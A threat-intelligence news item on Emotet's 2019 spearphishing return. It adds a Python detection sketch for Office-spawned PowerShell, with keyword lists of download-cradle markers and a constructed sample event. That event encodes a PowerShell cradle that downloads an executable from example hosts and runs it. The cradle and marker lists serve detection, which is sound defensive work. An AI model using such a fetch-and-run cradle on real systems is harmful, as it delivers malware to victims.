Emotet Is Back: Botnet Springs Back to Life with New Spam Campaign (Sep 16, 2019)
The threat intelligence team at Malwarebytes Labs has identified an active spam distribution campaign by the threat actors behind the “Emotet” trojan. Emotet’s operators are using targeted spearphishing techniques, including addressing the recipient by name and hijacking existing email threads, to target businesses across the globe. The malicious emails lure the victim into opening the attached macro-enabled document and enabling content, which starts the infection chain. The PowerShell command triggered by the macro attempts to download the Emotet binary from compromised websites; once installed, Emotet begins spreading laterally to other endpoints on the network. Emotet also serves as a delivery vector for more dangerous payloads, such as the TrickBot banking trojan and ransomware families.
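As an added example (not code from Malwarebytes, Anomali or the page), the following sketch shows how the macro-to-PowerShell stage described above can be surfaced from process-creation telemetry: it flags powershell.exe spawned by an Office application, decodes a -EncodedCommand payload (base64 of UTF-16LE text), and extracts download-cradle markers and URLs from the decoded script. The Sysmon-style field names (ParentImage, Image, CommandLine), the marker list, and the sample events, including the encoded cradle and its example.com/example.org URLs, are constructed for this illustration and are not observed Emotet artifacts.

```python
"""Detection sketch: Office-spawned PowerShell download cradle.

Added example, not the page's or any vendor's code. Log records below are
constructed Sysmon-style process-creation events (assumed field names:
ParentImage, Image, CommandLine), not captured Emotet telemetry.
"""
import base64
import json
import re
from dataclasses import dataclass, field
from typing import Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Substrings typical of a PowerShell download cradle (assumed list for this sketch).
DOWNLOAD_MARKERS = ("net.webclient", "downloadfile", "downloadstring",
                    "invoke-webrequest", "start-bitstransfer")
URL_RE = re.compile(r"https?://[^\s'\"(),;]+", re.IGNORECASE)
# -EncodedCommand and its short forms, followed by a base64 blob.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Alert:
    reasons: list = field(default_factory=list)
    urls: list = field(default_factory=list)


def inspect_event(event: dict) -> Optional[Alert]:
    """Flag PowerShell launched by an Office app and/or carrying a download cradle.
    Decodes any -enc payload first so markers and URLs hidden by encoding are seen."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if image not in ("powershell.exe", "pwsh.exe"):
        return None
    script = decode_encoded_command(cmdline)
    visible = (script or cmdline).lower()
    reasons = []
    if parent in OFFICE_PARENTS:
        reasons.append(f"powershell spawned by Office process {parent}")
    if script is not None:
        reasons.append("encoded command")
    hits = [m for m in DOWNLOAD_MARKERS if m in visible]
    if hits:
        reasons.append("download cradle: " + ", ".join(hits))
    # An Office parent or a cradle is worth a look on its own; -enc alone is not,
    # since some legitimate admin tooling uses it.
    if parent in OFFICE_PARENTS or hits:
        return Alert(reasons, URL_RE.findall(script or cmdline))
    return None


def scan(lines):
    """Run inspect_event over newline-delimited JSON; returns (line_no, Alert) pairs."""
    out = []
    for n, line in enumerate(lines, 1):
        if line.strip():
            alert = inspect_event(json.loads(line))
            if alert:
                out.append((n, alert))
    return out


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed payload: a multi-URL cradle of the general shape a maldoc macro launches.
CRADLE = ("$w=New-Object Net.WebClient;foreach($u in 'http://example.com/a/','http://example.org/b/')"
          "{try{$w.DownloadFile($u,\"$env:TEMP\\x.exe\");Start-Process \"$env:TEMP\\x.exe\";break}catch{}}")

# Constructed sample events: one maldoc chain, three benign-looking launches.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + encode_ps(CRADLE)},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -enc " + encode_ps("Get-Date")},
]).splitlines()

if __name__ == "__main__":
    for n, a in scan(SAMPLE_LOG):
        print(n, a.reasons, a.urls)
```

Only the first sample event fires: the Office parent, the encoded command and the cradle markers all line up, and the decoded script yields both download URLs for enrichment against threat intelligence. The fourth event shows why -enc by itself is not treated as an alert condition.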
Recommendation: Documents that ask you to enable content (macros) in order to view them properly are a common sign of a phishing attack. If such a file arrives from a known and trusted sender, contact that person through a separate channel (not by replying to the email, since Emotet inserts itself into existing threads) to verify the attachment before opening it. Any such attachment from an unknown sender should be treated with the utmost scrutiny, left unopened, and reported to the appropriate personnel.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.